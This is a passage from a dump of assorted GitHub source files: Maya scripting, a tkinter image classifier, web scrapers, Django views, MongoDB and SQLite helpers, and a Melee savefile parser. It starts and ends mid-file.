cmds.connectAttr(ctrl + '.Spread', lightShape + '.aiSpread')\n\n cmds.connectAttr(ctrl + '.DiffuseContribution', lightShape + '.aiDiffuse')\n cmds.connectAttr(ctrl + '.SpecularContribution', lightShape + '.aiSpecular')\n cmds.connectAttr(ctrl + '.SSSContribution', lightShape + '.aiSss')\n cmds.connectAttr(ctrl + '.IndirectContribution', lightShape + '.aiIndirect')\n cmds.connectAttr(ctrl + '.VolumeContribution', lightShape + '.aiVolume')\n\n lightShape = cmds.listRelatives(light, shapes=True)\n cmds.connectAttr(light + '.cpvColor', lightShape[0] + '.color')\n cmds.parent(light, vtx, relative=True)\n target = cmds.spaceLocator(name=mesh + light + id + '_target')[0]\n cmds.parent(target, vtx, relative=True)\n cmds.setAttr(target + '.translateX', 10)\n cmds.aimConstraint(target, light, weight=1, offset=(0, -90, 90), aimVector=(1, 0, 0), upVector=(0, 1, 0),worldUpType='vector', worldUpVector=(0, 1, 0))\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleX')\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleY')\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleZ')\n cmds.connectAttr(ctrl + '.targetsDisplay', target + '.visibility')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleX')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleY')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleZ')\n\n# Sort things\n\nlocsCol = cmds.select('vertexConstraint*_' + colorBake + '_vtx_*')\ncmds.group(name=mesh + '_colorHisto')\ncolGrp = cmds.ls(sl=True)[0]\nlocsPos = cmds.select('vertexConstraint*_' + mesh + '_vtx_*')\ncmds.group(name=mesh + '_posHisto')\nposGrp = cmds.ls(sl=True)[0]\ncmds.parent(colorBake, colGrp)\ncmds.setAttr(colGrp + '.visibility', 0)\ncmds.group(name=mesh + '_targetsPos', empty=True, world=True)\ntargetGrp = cmds.ls(sl=True)[0]\ncmds.select(mesh + '*_target')\ntargets = cmds.ls(sl=True)\ncmds.parent(targets, targetGrp, absolute=True)\n\nanno = cmds.annotate(ctrl, text='Light controls for ' + mesh, point=(0, 7, 0))\nannoTransform = cmds.listRelatives(anno, parent=True)[0]\ncmds.parent(anno, ctrl, shape=True, relative=True)\ncmds.delete(annoTransform)\ncmds.select(ctrl)\n","repo_name":"nagasimon/Maya","sub_path":"divers/lightRig_paolo.py","file_name":"lightRig_paolo.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4530548895","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef main():\n for line in sys.stdin:\n a = []\n for i in line.strip():\n if i.islower():\n i = i.replace(i, \" \")\n a.append(i)\n\n a = \"\".join(a).split(\" \")\n print(max(a))\n\nif __name__ == '__main__':\n main()\n","repo_name":"AnzheYuan1217/DCU","sub_path":"CA117/Sample_LabExam/uppers_052.py","file_name":"uppers_052.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"27807218423","text":"import cv2\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog as fd\r\nimport pickle\r\n\r\ndef ml_work(filename,x):\r\n new_img = cv2.imread(filename)\r\n new_img = cv2.resize(new_img,(150,200))\r\n new_img = new_img.flatten()\r\n p = open(\"obj.txt\",\"rb\")\r\n model = pickle.load(p)\r\n ar = model.predict([new_img])\r\n l = ['computer mouse', 'neckband headset', 'smart watch']\r\n name_obj = l[int(ar[0])]\r\n if x == 1:\r\n obj_l.config(text=name_obj)\r\n elif x==2:\r\n 
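# x == 2: the prediction came from the camera capture path\r\n        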
obj_c.config(text=name_obj)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncancel = False\r\n\r\ndef prompt_ok(event = 0):\r\n global cancel, button, button1, button2\r\n cancel = True\r\n\r\n button.place_forget()\r\n button1 = Button(cam, text=\"Good Image!\", command=saveAndExit)\r\n button1.place(anchor=CENTER, relx=0.2, rely=0.9, width=150, height=50)\r\n button2 = Button(cam, text=\"Try Again\", command=resume)\r\n button2.place(anchor=CENTER, relx=0.8, rely=0.9, width=150, height=50)\r\n button1.focus()\r\n\r\ndef saveAndExit(event = 0):\r\n global img,lmain\r\n\r\n filepath = \"imageCap.png\"\r\n img.save(filepath)\r\n lmain.focus()\r\n ml_work(filepath, 2)\r\n\r\ndef resume(event = 0):\r\n global button1, button2, button, lmain, cancel\r\n\r\n cancel = False\r\n\r\n button1.place_forget()\r\n button2.place_forget()\r\n\r\n button.place(bordermode=INSIDE, relx=0.5, rely=0.9, anchor=CENTER, width=300, height=50)\r\n lmain.after(10, video_stream)\r\n\r\ndef video_stream():\r\n global img\r\n _, frame = cap.read()\r\n frame = cv2.flip(frame,1)\r\n frame = cv2.resize(frame,(600,500))\r\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n img = Image.fromarray(cv2image)\r\n imgtk = ImageTk.PhotoImage(image=img)\r\n lmain.imgtk = imgtk\r\n lmain.configure(image=imgtk)\r\n if not cancel:\r\n lmain.after(10, video_stream)\r\n\r\n\r\ndef open_camera():\r\n global cap,lmain,cam,button\r\n cam = Toplevel()\r\n cam.resizable(width=False, height=False)\r\n cap = cv2.VideoCapture(0)\r\n capWidth = cap.get(3)\r\n capHeight = cap.get(4)\r\n\r\n lmain = Label(cam, compound=CENTER, anchor=CENTER, relief=RAISED)\r\n lmain.pack()\r\n\r\n button = Button(cam, text=\"Capture\", command=prompt_ok)\r\n button.place(bordermode=INSIDE, relx=0.5, rely=0.9, anchor=CENTER, width=300, height=50)\r\n button.focus()\r\n\r\n video_stream()\r\n\r\n cam.mainloop()\r\n\r\n\r\ndef local_com():\r\n filetypes = (('image jpg files', '*.jpg'),('png files', '*.png'))\r\n filename = fd.askopenfilename(title='Open a file',initialdir='/',filetypes=filetypes)\r\n ml_work(filename,1)\r\n\r\n\r\n\r\n\r\n\r\n\r\nwin = Tk()\r\nwin.geometry(\"1020x500\")\r\nwin.resizable(False,False)\r\nwin.title(\"Object Classification\")\r\nwin.config(bg = \"yellow\")\r\n\r\n\r\n\r\nLabel(win,text=\"Local Computer Drive\",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=50,y=70,height=60,width=410)\r\n\r\nlocal = Button(win,text = \"Open Folder\",font = (\"Time New Roman\",20,\"bold\"),command=local_com)\r\nlocal.place(x=150,y=180,height=60,width=200)\r\n\r\ncanvas = Canvas(win, width=5, height=win.winfo_screenheight(), bg='yellow',borderwidth=0)\r\ncanvas.place(x = 510,y=0)\r\ncanvas.create_line((5, 0), (5, win.winfo_screenheight()), width=5, fill='gray')\r\n\r\nLabel(win,text=\"Object Name : \",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=50,y=290,height=60,width=410)\r\n\r\nobj_l = Label(win,text=\"\",font = (\"Time New Roman\",30,\"bold\"))\r\nobj_l.place(x=50,y=370,height=60,width=410)\r\n\r\n\r\nLabel(win,text=\"Open Camera\",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=560,y=70,height=60,width=410)\r\n\r\ncam1 = Button(win,text = \"Open Camera\",font = (\"Time New Roman\",20,\"bold\"),command=open_camera)\r\ncam1.place(x=660,y=180,height=60,width=200)\r\n\r\nLabel(win,text=\"Object Name : \",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=560,y=290,height=60,width=410)\r\n\r\nobj_c = Label(win,text=\"\",font = (\"Time New 
Roman\",30,\"bold\"))\r\nobj_c.place(x=560,y=370,height=60,width=410)\r\n\r\nwin.mainloop()","repo_name":"gauravprajapat29/object_detection_and_name_prediction","sub_path":"object_classification.py","file_name":"object_classification.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"713686373","text":"import requests\nfrom bs4 import BeautifulSoup, element\n\n\nclass Indeed:\n def __init__(self, words, location, offset):\n self.url = \"https://www.indeed.com/jobs?as_and={}&l={}&sort=date&start={}\".format(\n \"+\".join(set(d.strip().lower() for d in words.split(\",\") if d)),\n \"+\".join(list(d.lower() for d in location.split(\" \") if d)),\n int(offset),\n )\n\n def extract(self, soup):\n if not soup:\n return []\n jobs = []\n for tag in soup.find_all(name=\"div\", attrs={\"class\": \"jobsearch-SerpJobCard\"}):\n job = {}\n for child in tag.children:\n if child and type(child) == element.Tag and child.attrs:\n if child.attrs[\"class\"][0] == \"title\":\n job[\"title\"] = child.get_text().strip()\n for grandchild in child.find_all(name=\"a\"):\n if grandchild.has_attr(\"href\"):\n job[\"link\"] = (\n \"https://www.indeed.com\" + grandchild[\"href\"]\n )\n elif child.attrs[\"class\"][0] == \"sjcl\":\n lines = child.get_text().strip().split(\"\\n\")\n job[\"company\"] = lines[0]\n job[\"location\"] = lines[-1]\n elif child.attrs[\"class\"][0] == \"jobsearch-SerpJobCard-footer\":\n job[\"date\"] = \"n/a\"\n for grandchild in child.find_all(\n name=\"span\", attrs={\"class\": \"date\"}\n ):\n job[\"date\"] = grandchild.get_text()\n jobs.append(job)\n return jobs\n\n def fetch(self):\n soup = None\n try:\n r = requests.get(self.url)\n r.raise_for_status()\n soup = BeautifulSoup(r.text, \"html.parser\")\n finally:\n return soup\n\n def search(self):\n soup = self.fetch()\n jobs = self.extract(soup)\n return jobs\n","repo_name":"kzkaneoka/custom-job-search","sub_path":"services/backend/project/api/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5450055364","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import FormView\nfrom django.contrib.auth import login, logout\nfrom django.views.generic.base import View\nfrom django.http import HttpResponseRedirect\n\nfrom shop.forms import CreationItemForm\nfrom shop.models import Item\nfrom users.forms import *\nfrom users.models import Profile\n\n\nclass LoginFormView(FormView):\n form_class = AuthenticationForm\n template_name = \"login.html\"\n success_url = \"/\"\n\n def form_valid(self, form):\n self.user = form.get_user()\n login(self.request, self.user)\n return super(LoginFormView, self).form_valid(form)\n pass\n\n\ndef registration(request):\n if request.method == 'POST':\n form = SingUp(request.POST, request.FILES)\n if form.is_valid():\n user = form.save(commit=False)\n #user.is_active = False\n user.save()\n\n profile = Profile()\n profile.user = user\n profile.ava = request.FILES['account_image']\n profile.save()\n return HttpResponseRedirect(\"/users/login\")\n else:\n form = SingUp()\n return render(request, 'reg.html', {'form': form})\n\n\nclass LogoutFormView(View):\n\n def get(self, request):\n logout(request)\n return HttpResponseRedirect(\"/\")\n 
pass\n\n\nclass ProfileUser(DetailView):\n\n    template_name = \"profile.html\"\n\n    def get(self, request, id):\n        form = CreationItemForm()\n        user = get_object_or_404(User, id=id)\n        profile = get_object_or_404(Profile, user=user)\n        items = Item.objects.filter(owner=id)\n        #users = User.objects.all().select_related('profile')\n        return render(request, self.template_name, {'current_user': user, 'profile': profile, 'form': form, 'items': items})\n\n    def post(self, request, *args, **kwargs):\n        form = CreationItemForm(request.POST, request.FILES)\n        if form.is_valid():\n            id = kwargs['id']\n            cd = form.cleaned_data\n            user = get_object_or_404(User, id=id)\n            profile = get_object_or_404(Profile, user=user)\n\n            item = Item(owner=user,\n                        category=cd['category'],\n                        icon=cd['icon'],\n                        name=cd['name'],\n                        price=cd['price'],\n                        description=cd['description']).save()\n            self.get(request, id)\n            form = CreationItemForm()\n        return render(request, self.template_name, {'current_user': user, 'profile': profile, 'form': form})","repo_name":"vadimsmilgin/salePlace","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18236375962","text":"# -*- coding: utf-8 -*-\n# @Time : 18/03/2018\n# @Author : Luke\n\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport pymongo\nfrom fake_useragent import UserAgent\n\nMINPRICE = 2000  # minimum price\nMAXPRICE = 3500  # maximum price\nMAXDISTANCE = 7  # max total distance between the target location and the candidate locations\nCITY = \"上海\"  # city\nNB_ROOM = {'1室', '2室', }  # number of rooms\n\nCOOKIE = None\nproxies = [\n    \"http://localhost:1087\",\n    ''\n]  # proxy addresses\n\nak = \"\"  # Baidu LBS service key, apply for your own (http://lbsyun.baidu.com/apiconsole/key)\n# if you use a different LBS service, also update the get_lbs function in pipelines\n\n# GPS, (longitude,latitude)\n# primary\nGPS1 = {\"lat\": 31.239777,\n        \"lng\": 121.669717}  # GPS of the target location\n# Secondary  # GPS of the candidate locations\nGPS2 = [\n    # {\"lat\": 31.219828,\n    # \"lng\": 121.662625},  # 唐镇地铁站\n    # {\"lat\": 31.216703,\n    # \"lng\": 121.627179},  # 广兰路地铁站\n    {\"lat\": 31.269485,\n     \"lng\": 121.64549},  # 金海路地铁站\n    {\"lat\": 31.272188,\n     \"lng\": 121.663},  # 顾唐路地铁站\n    {\"lat\": 31.274649,\n     \"lng\": 121.674609},  # 明雷路地铁站\n    {\"lat\": 31.26994,\n     \"lng\": 121.634401}  # 金吉路地铁站\n]\nlocations = [  # location names matching GPS2\n    # \"唐镇地铁站\",\n    # \"广兰路地铁站\",\n    \"金海路地铁站\",\n    \"顾唐路地铁站\",\n    \"明雷路地铁站\",\n    \"金吉路地铁站\",\n]\n\n\ndef get_collection(host, db, collection):\n    client = pymongo.MongoClient(host)\n    db = client[db]\n    collection = db[collection]\n    return collection\n\ncollection = get_collection('localhost', 'mydb', 'rent_info')  # mongo collection for saved rent info\n\n\nRADIUS = 6378.137  # km\n\nutils_path = os.path.abspath(__file__)\nutils_path = os.path.split(utils_path)[0]\n\n\ndef write_files(file_path, items):\n    length = len(items)\n    with open(file_path, 'w') as f:\n        for i, item in enumerate(items, 1):\n            if isinstance(item, str):\n                f.write(item)\n            else:\n                f.write(' '.join(item))\n            if i < length:\n                f.write('\\n')\n\n\ndef random_interval():\n    print('generate interval')\n    return np.random.rand() * 5\n\n\nua = UserAgent(use_cache_server=False, verify_ssl=False)\n\n\ndef random_agent():\n    headers = {'User-Agent': ua.random}\n    return headers\n\n\ndef gps2distance(origin, destination):\n    lat1, lon1 = origin['lat'], origin['lng']\n    lat2, lon2 = destination['lat'], destination['lng']\n\n    dlat = math.radians(lat2 - lat1)\n    dlon = math.radians(lon2 - lon1)\n    a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) \\\n        * math.cos(math.radians(lat2)) * math.sin(dlon / 2) 
* math.sin(dlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n\n return d\n\n\nalphabet = [chr(c) for c in range(97, 123)]\n\n\ndef random_string():\n length = random.randint(3, 7)\n return ''.join([random.choice(alphabet) for _ in range(length)])\n\n\ndef random_key_value():\n key = random_string()\n value = random_string()\n return key + '=' + value\n\n\nif __name__ == '__main__':\n print(random_key_value())\n","repo_name":"nju-luke/RentInfo","sub_path":"spider/tc58/tc58/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"35650986643","text":"# -*- coding: utf8 -*-\nfrom config import cos_config\nfrom qcloud_cos import CosConfig, CosS3Client\n\nconfig = CosConfig(Region=cos_config[\"region\"], Secret_id=cos_config[\"secret_id\"],\n Secret_key=cos_config[\"secret_key\"], Token=cos_config[\"cos_token\"])\ncos_client = CosS3Client(config)\n\n\ndef calculate_sign(path=None, method=\"POST\", headers=None, params=None):\n if params is None:\n params = {}\n if headers is None:\n headers = {}\n if path is None:\n path = {}\n sign = cos_client.get_auth(Method=method,\n Bucket=cos_config[\"bucket\"] + \"-\" + cos_config[\"app_id\"],\n Key=path,\n Headers=headers,\n Params=params)\n return sign\n","repo_name":"MeiCorl/ShoppingMall","sub_path":"utils/cos_util.py","file_name":"cos_util.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"13354846414","text":"from pymongo import MongoClient\nclient = MongoClient()\n\n# print(client.database_names()) #print the name of available databases\ndb = client.Northwind\ncustomers = db.customers\nproducts = db.products\norders = db.orders\norder_details = db['order-details']\n\n\nfor order in orders.find({\"CustomerID\":\"ALFKI\"}):\n for order_detail in order_details.find({\"OrderID\":order[\"OrderID\"]}):\n for product in products.find({\"ProductID\":order_detail[\"ProductID\"]}):\n print(order[\"OrderID\"], product[\"ProductName\"], product[\"ProductID\"])\n","repo_name":"Anonyme38/Computational-Tools-for-Big-Data","sub_path":"SQL_NO-SQL/ex1_pymongo.py","file_name":"ex1_pymongo.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21819329615","text":"import sqlite3\nimport pandas as pd\n\nfrom .conn import conn, cur\n\n\n#Functions for 'tanks' table.\n\n\ndef get_percentiles_data(tank_ids):\n columns = [\n 'battle_life_time', 'battles', 'capture_points', 'damage_assisted_radio',\n 'damage_assisted_track', 'damage_dealt', 'damage_received', 'direct_hits_received',\n 'dropped_capture_points', 'explosion_hits', 'explosion_hits_received', 'frags',\n 'hits', 'losses', 'mark_of_mastery', 'max_frags',\n 'max_xp', 'no_damage_direct_hits_received', 'piercings', 'piercings_received',\n 'shots', 'spotted', 'survived_battles', 'trees_cut',\n 'wins', 'xp'\n ]\n\n tank_ids_str = ', '.join([str(x) for x in tank_ids])\n columns_str = ', '.join(columns)\n\n data = cur.execute(f'''\n SELECT {columns_str} FROM tanks WHERE tank_id IN ({tank_ids_str});\n ''').fetchall()\n\n return columns, data\n\n\ndef get_dataframe(tank_ids, columns, min_battles=1):\n\n tank_ids_str = ', '.join([str(x) for x in tank_ids])\n columns_str = ', '.join(columns)\n\n return pd.read_sql(f'''\n SELECT {columns_str} FROM tanks\n WHERE tank_id 
IN ({tank_ids_str}) AND battles >= {min_battles}\n ''', conn)\n\n\ndef insert_tank(tank_data):\n '''Insert one tank into database.\n\n Arguments:\n tank_data:Dict[str, num] - data dictionary for a tank.\n Returns:\n None\n '''\n\n columns = [\n 'tank_id', 'last_battle_time', 'account_id',\n 'server', 'battle_life_time', 'battles',\n 'capture_points', 'damage_assisted_radio', 'damage_assisted_track',\n 'damage_dealt', 'damage_received', 'direct_hits_received',\n 'dropped_capture_points', 'explosion_hits', 'explosion_hits_received',\n 'frags', 'hits', 'losses',\n 'mark_of_mastery', 'max_frags', 'max_xp',\n 'no_damage_direct_hits_received', 'piercings', 'piercings_received',\n 'shots', 'spotted', 'survived_battles',\n 'trees_cut', 'wins', 'xp'\n ]\n\n columns_str = ', '.join(columns)\n question_marks = ', '.join(['?' for _ in columns])\n\n #Triggers replace if there is a tank_id for the same player in database.\n query = f'INSERT OR REPLACE INTO tanks ({columns_str}) VALUES ({question_marks});'\n values = [tank_data[name] for name in columns]\n cur.execute(query, values)\n\n\ndef cleanup_space(tank_id, min_battles):\n '''Remove up to 10 records with less than minimum number of battles.\n Or remove 50 oldest records.\n\n Arguments:\n tank_id:int - tank_id to remove rows of.\n min_battles:int - minimum battles for the tank_id.\n Returns:\n None\n '''\n\n #Getting count of tanks with battles less than minimum.\n count = cur.execute('''\n SELECT COUNT(*) FROM tanks\n WHERE tank_id = ? AND battles < ?;\n ''', (tank_id, min_battles)).fetchone()[0]\n\n\n if count > 0:\n #Deleting oldest 50 with battles less than minimum.\n cur.execute('''\n DELETE FROM tanks\n WHERE tank_id = ? AND account_id IN (\n SELECT account_id FROM tanks\n WHERE tank_id = ? AND battles < ?\n ORDER BY last_battle_time ASC LIMIT 50\n );\n ''', (tank_id, tank_id, min_battles))\n else:\n #Deleting oldest 10.\n cur.execute('''\n DELETE FROM tanks\n WHERE tank_id = ? AND last_battle_time IN (\n SELECT last_battle_time FROM tanks\n WHERE tank_id = ?\n ORDER BY last_battle_time ASC LIMIT 10\n );\n ''', (tank_id, tank_id))\n\n\ndef insert_player(player_data, tankopedia):\n '''Insert tanks for one player.\n \n Arguments:\n player_data:List[Obj] - player tanks as list of dictionaries.\n tankopedia:Dict[str, Obj] - tankopedia object.\n Returns:\n None\n '''\n\n for tank_data in player_data:\n tank_id = tank_data['tank_id']\n\n #Getting count of the tank_id.\n count = cur.execute('SELECT COUNT(account_id) FROM tanks WHERE tank_id = ?', (tank_id,)).fetchone()[0]\n\n #No min_battles check.\n if count < 1000:\n insert_tank(tank_data)\n continue\n\n #Calculating min_battles. Skip if tank not in tankopedia.\n tier = tankopedia.get(str(tank_id), {}).get('tier')\n if tier:\n min_battles = tier * 10 + tier * 10 / 2\n\n #Cleanup if too many.\n if count >= 1100:\n cleanup_space(tank_id, min_battles)\n\n if tank_data['battles'] >= min_battles:\n insert_tank(tank_data)\n\n conn.commit()\n","repo_name":"chipsi007/wot-console-wn8","sub_path":"main/database/table_tanks.py","file_name":"table_tanks.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42827524752","text":"\"\"\" ssbm_format.py - interfaces for manipulating Melee savefiles \"\"\"\n\nimport os\nimport struct\n\nfrom ssbmpack import unpack, pack\n\nclass melee_gci(object):\n \"\"\" Base class for GCI files. 
Just basic setter/getter stuff for dentry\n    data, and some machinery for reading files \"\"\"\n\n    def __init__(self, filename, packed=None):\n        self._filename = os.path.basename(filename).split(\".\")[0]\n        self.raw_bytes = bytearray()\n        try:\n            self.fd = open(filename, \"rb\")\n            self.filesize = os.stat(filename).st_size\n            self.raw_bytes = bytearray(self.fd.read(self.filesize))\n            self.fd.seek(0x0)\n            print(\"Read {} bytes from input GCI\".format(hex(self.filesize)))\n        except FileNotFoundError as e:\n            print(e)\n            self.fd = None\n            self.raw_bytes = None\n            self.filesize = None\n            return None\n\n        # Let the user tell us whether or not the GCI is packed when importing\n        # a file - this should help us tell the user not to do something that\n        # might end up corrupting their data (or something to that effect).\n        self.packed = packed\n\n    ''' These functions return other types '''\n\n    def blocksize(self):\n        return struct.unpack(\">h\", self.raw_bytes[0x38:0x3a])[0]\n\n    ''' These functions return raw bytes '''\n\n    def dump(self):\n        return self.raw_bytes\n    def get_dentry(self):\n        return self.raw_bytes[0:0x40]\n    def get_game_id(self):\n        return self.raw_bytes[0x00:0x04]\n    def get_maker_code(self):\n        return self.raw_bytes[0x04:0x06]\n    def get_filename(self):\n        return self.raw_bytes[0x08:0x28]\n    def get_modtime(self):\n        return self.raw_bytes[0x28:0x2c]\n    def get_image_off(self):\n        return self.raw_bytes[0x2c:0x30]\n    def get_icon_fmt(self):\n        return self.raw_bytes[0x30:0x32]\n    def get_anim_speed(self):\n        return self.raw_bytes[0x32:0x34]\n    def get_permissions(self):\n        return self.raw_bytes[0x34:0x35]\n    def get_copy_ctr(self):\n        return self.raw_bytes[0x35:0x36]\n    def get_first_block(self):\n        return self.raw_bytes[0x36:0x38]\n    def get_block_count(self):\n        return self.raw_bytes[0x38:0x3a]\n    def get_comment_addr(self):\n        return self.raw_bytes[0x3c:0x40]\n    def set_filename(self, new_filename):\n        self.raw_bytes[0x08:0x28] = new_filename\n    def set_modtime(self, new_modtime):\n        self.raw_bytes[0x28:0x2c] = struct.pack(\">L\", new_modtime)\n    def set_block_count(self, new_bc):\n        self.raw_bytes[0x38:0x3a] = new_bc\n    def set_comment_addr(self, new_addr):\n        self.raw_bytes[0x3c:0x40] = new_addr\n    def set_permissions(self, new_perm):\n        self.raw_bytes[0x34:0x35] = struct.pack(\">B\", new_perm)\n    def _checksum(self, target_offset, count):\n        \"\"\" Given some offset into raw_bytes and a count, compute checksum\n        over the set of bytes in the GCI \"\"\"\n\n        # This is the seed for all checksum values\n        new_checksum = bytearray( b'\\x01\\x23\\x45\\x67\\x89\\xAB\\xCD\\xEF' +\n                b'\\xFE\\xDC\\xBA\\x98\\x76\\x54\\x32\\x10' )\n        cur = 0\n        cur_arr = 0\n        arr_pos = 0\n        x = 0\n        y = 0\n        ctr = (count) / 8\n        while (ctr > 0):\n            for i in range(0, 8):\n                cur = self.raw_bytes[target_offset + i]\n                cur_arr = new_checksum[(arr_pos & 0xf)]\n                new_checksum[(arr_pos & 0xf)] = (cur + cur_arr) & 0xff\n                arr_pos += 1\n            ctr -= 1\n            target_offset += 8\n        for i in range(1, 0xf):\n            x = new_checksum[i-1]\n            y = new_checksum[i]\n            if (x == y):\n                x = y ^ 0x00FF\n                new_checksum[i] = x\n        return new_checksum\n\nclass melee_gamedata(melee_gci):\n    ''' Class representing a plain-ol' Melee gamedata savefile (0x16040 bytes).\n        The checksum/packing functions here are specific to the format,\n        so you'll need another class for other types of save files. 
'''\n\n def get_raw_checksum(self, blknum):\n \"\"\" Return checksum bytes for some block 0-10 \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize()-1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self.raw_bytes[target_offset:target_offset + 0x10]\n else:\n return None\n\n def set_raw_checksum(self, blknum, new_checksum):\n \"\"\" Given some blknum 0-10 and a 0x10-byte bytearray, replace the\n specified checksum bytes with the new bytes \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize() -1)):\n target_offset = base_offset + (blknum * 0x2000)\n self.raw_bytes[target_offset:target_offset + 0x10] = new_checksum\n else:\n print(\"[!] Can't set checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def checksum_block(self, blknum):\n \"\"\" Given some block number 0-10, compute the checksum for the\n associated data. Returns the raw checksum bytes. \"\"\"\n base_offset = 0x2050\n data_size = 0x1ff0\n if (blknum >= 0) and (blknum <= (self.blocksize() - 1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self._checksum(target_offset, data_size)\n else:\n print(\"[!] Can't compute checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def recompute_checksums(self):\n \"\"\" Recompute all checksum values and write them back \"\"\"\n if (self.packed is True):\n print(\"[!] You can only recompute checksums on unpacked data\")\n exit(-1)\n\n # Retrieve checksum values for all blocks\n current = []\n for i in range(0, self.blocksize()-1):\n current.append(self.get_raw_checksum(i))\n\n # Compute checksum values for all blocks\n computed = []\n for i in range(0, self.blocksize()-1):\n computed.append(self.checksum_block(i))\n\n # If current checksums don't match, write them back\n for i in range(0, self.blocksize()-1):\n if (current[i] != computed[i]):\n print(\"[*] Block {} checksum mismatch, fixing ..\".format(i))\n self.set_raw_checksum(i, computed[i])\n else:\n print(\"[*] Block {} checksum unchanged\".format(i))\n\n def get_block(self, blknum):\n ''' Get the data portion of some block '''\n if (blknum > 10):\n return None\n base = 0x2000 * blknum + 0x2060\n return self.raw_bytes[base:(base + 0x1fe0)]\n\n def set_block(self, blknum, data):\n ''' Set the data on some block; takes a 0x1fe0-byte bytearray '''\n if (blknum > 10):\n return None\n base = 0x2000 * blknum + 0x2060\n self.raw_bytes[base:(base + 0x1fe0)] = data\n\n def unpack(self):\n \"\"\" Unpack all blocks of data \"\"\"\n if (self.packed is False):\n print(\"[!] Data is already unpacked - refusing to unpack\")\n exit(-1)\n print(\"[*] Unpacking GCI data\")\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is True):\n self.packed = False\n\n def pack(self):\n \"\"\" Pack all blocks of data \"\"\"\n if (self.packed is True):\n print(\"[!] 
Data is already packed -- refusing to pack\")\n exit(-1)\n print(\"[*] Packing GCI data\")\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = pack(prev, cursor)\n self.raw_bytes[i] = res\n prev = res\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is False):\n self.packed = True\n\n\nclass melee_snapshot(melee_gci):\n \"\"\" Class representing a snapshot file. \"\"\"\n def get_raw_region_0_checksum(self):\n return self.raw_bytes[0x1e80:0x1e90]\n def get_raw_header_checksum(self):\n return self.raw_bytes[0x1eb0:0x1ec0]\n def get_raw_checksum(self, blknum):\n \"\"\" Return checksum bytes for some block 0-10 \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize()-1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self.raw_bytes[target_offset:target_offset + 0x10]\n else:\n return None\n\n def set_raw_region_0_checksum(self, new_checksum):\n self.raw_bytes[0x1e80:0x1e90] = new_checksum\n def set_raw_header_checksum(self, new_checksum):\n self.raw_bytes[0x1eb0:0x1ec0] = new_checksum\n def set_raw_checksum(self, blknum, new_checksum):\n \"\"\" Given some blknum 0-10 and a 0x10-byte bytearray, replace the\n specified checksum bytes with the new bytes \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize() -1)):\n target_offset = base_offset + (blknum * 